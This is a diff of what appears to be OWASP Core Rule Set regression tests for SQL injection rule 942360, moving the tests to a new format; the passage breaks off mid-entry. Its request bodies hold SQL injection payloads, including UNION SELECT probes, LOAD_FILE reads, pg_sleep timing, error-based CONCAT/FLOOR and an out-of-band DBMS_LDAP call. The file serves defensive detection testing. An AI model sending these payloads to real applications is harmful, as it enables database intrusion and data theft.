+ - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 3 desc: "Detects concatenated basic SQL injection 
and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 
942360-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 8 desc: "Detects 
concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - 
log_contains: id "942360" - - test_title: 942360-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: 
[942360] + - test_id: 13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 14 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 15 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-16 + - input: + dest_addr: 
127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 16 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 17 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Delete (Trashcan)" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 18 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "5desc" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "5desc" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 19 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "34-delete" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "34-delete" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 20 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " update" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test 
agent" + method: POST + port: 80 + uri: "/post" + data: " update" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 21 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "/select-quote" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "/select-quote" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 22 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Update: After..." - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Update: After..." 
+ version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 23 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "\"desc\"" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "\"desc\"" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 24 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/load.php" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/load.php" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 25 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/update-assets" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-26 + - input: + 
dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/update-assets" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 26 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "bla blabla live update chart" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 27 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ".select-gws-banana" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ".select-gws-banana" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 28 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "blablabla. As evidence from the following blablabla" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 29 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-30 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 30 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "'||(select(pg_sleep(15))where(true))||'/investigate" - 
version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 31 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 32 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2020-03-01 UNION ALL SELECT CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: 
"OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 33 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "x\"; SELECT LOAD_FILE('" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 34 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "-1 UNION SELECT null,123456,null,null,null,null--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 35 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 36 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 37 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" - version: 
HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 38 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 